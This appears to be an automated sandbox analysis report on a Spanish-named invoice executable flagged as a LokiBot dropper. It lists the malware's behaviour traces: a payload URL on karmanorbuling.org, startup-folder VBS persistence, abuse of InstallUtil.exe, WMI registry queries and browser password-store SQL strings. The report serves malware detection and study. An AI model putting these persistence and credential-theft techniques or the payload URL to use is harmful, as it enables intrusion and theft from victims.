                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karmanorbuling.org
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karmanorbuling.org/Ggclxuylpwh.mp3
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://linqtosql-plus.net/pricing.
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: InstallUtil.exe, 00000004.00000002.2549138176.0000000000EE2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.0000000001319000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2551127147.0000000004846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownHTTPS traffic detected: 218.208.91.137:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 218.208.91.137:443 -> 192.168.2.7:49808 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Source: 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Source: 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Writes or reads registry keys via WMI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_012620D81_2_012620D8
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_01261A501_2_01261A50
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_012620CA1_2_012620CA
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_0126B4211_2_0126B421
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_0126B4301_2_0126B430
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_0126BA401_2_0126BA40
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_0126BA501_2_0126BA50
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_077400401_2_07740040
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeCode function: 1_2_0774003A1_2_0774003A
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_00E820D88_2_00E820D8
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_00E820C78_2_00E820C7
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_00E8B4218_2_00E8B421
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_00E8B4308_2_00E8B430
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_00E8BA408_2_00E8BA40
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_00E8BA508_2_00E8BA50
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_074A00408_2_074A0040
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeCode function: 8_2_074A003A8_2_074A003A
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUinwrlpym.exe4 vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameboondoggles.exe vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003F32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameboondoggles.exe vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1402605385.0000000006A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameThhvbfnlkj.dll" vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003E11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000000.1282752558.0000000000572000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameUinwrlpym.exe4 vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1385443181.0000000000EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1405689602.0000000006F00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exeBinary or memory string: OriginalFilenameUinwrlpym.exe4 vs Factura modificada____678979879.exe
                  Source: Factura modificada____678979879.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Factura modificada____678979879.exe, CollectionExceptionStrategy.csTask registration methods: 'RegisterTask', 'CreateTask'
                  Source: Factura modificada____678979879.exe, CodeAdvisorTask.csTask registration methods: 'CreateValue'
                  Source: Factura modificada____678979879.exe, SingletonAdvisorTask.csTask registration methods: 'CreateTable'
                  Source: Factura modificada____678979879.exe, MappingAdvisorTask.csTask registration methods: 'RegisterObservableIndexer'
                  Source: Factura modificada____678979879.exe, WatcherAdvisorTask.csTask registration methods: 'RegisterObservableMessage', 'CreateObservableMessage'
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.Factura modificada____678979879.exe.3e19550.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.Factura modificada____678979879.exe.6f00000.14.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbph:@5
                  Source: InstallUtil.exe, 00000004.00000002.2545997056.0000000000438000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2545978610.000000000043E000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: DA@*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                  Source: InstallUtil.exeBinary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                  Source: InstallUtil.exeBinary or memory string: *\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@12/11@2/2
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeMutant created: \Sessions\1\BaseNamedObjects\Nsiqzan
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3540:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs"
                  Source: Factura modificada____678979879.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Factura modificada____678979879.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: InstallUtil.exeBinary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000000.1282752558.0000000000572000.00000002.00000001.01000000.00000004.sdmp, WrappedObject.exe.1.drBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000000.1282752558.0000000000572000.00000002.00000001.01000000.00000004.sdmp, WrappedObject.exe.1.drBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);@pk_G@(Model.PrimaryKeyStagingJoinMerge)sINSERT INTO @(Model.DestinationTableName) DEFAULT VALUES;
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000000.1282752558.0000000000572000.00000002.00000001.01000000.00000004.sdmp, WrappedObject.exe.1.drBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000000.1282752558.0000000000572000.00000002.00000001.01000000.00000004.sdmp, WrappedObject.exe.1.drBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000000.1282752558.0000000000572000.00000002.00000001.01000000.00000004.sdmp, WrappedObject.exe.1.drBinary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000000.1282752558.0000000000572000.00000002.00000001.01000000.00000004.sdmp, WrappedObject.exe.1.drBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
                  Source: LogfreezedJejbRsWuZJfPEdhhZqjCJQgvjEvfirmers.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Factura modificada____678979879.exeReversingLabs: Detection: 57%
                  Source: Factura modificada____678979879.exeVirustotal: Detection: 63%
                  Source: Factura modificada____678979879.exeString found in binary or memory: Oops! A destination column has been mapped more than once; see the inner exception for more details. A common error with Dapper Plus is using `Global Context Mapping` inside a method (which adds the same mapping over and over every time the method is called). Use an `Instance Context Mapping` instead to solve it: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
                  Source: Factura modificada____678979879.exeString found in binary or memory: -Oops! A Bulk Operation is currently in progress, you currently cannot change the mapping. A common error is a `Global Context Mapping` is modified inside a method, use a `Instance Context Mapping` instead: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeFile read: C:\Users\user\Desktop\Factura modificada____678979879.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Factura modificada____678979879.exe "C:\Users\user\Desktop\Factura modificada____678979879.exe"
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\WrappedObject.exe "C:\Users\user\AppData\Roaming\WrappedObject.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\WrappedObject.exe "C:\Users\user\AppData\Roaming\WrappedObject.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeSection loaded: dnsapi.dllJump to behavior
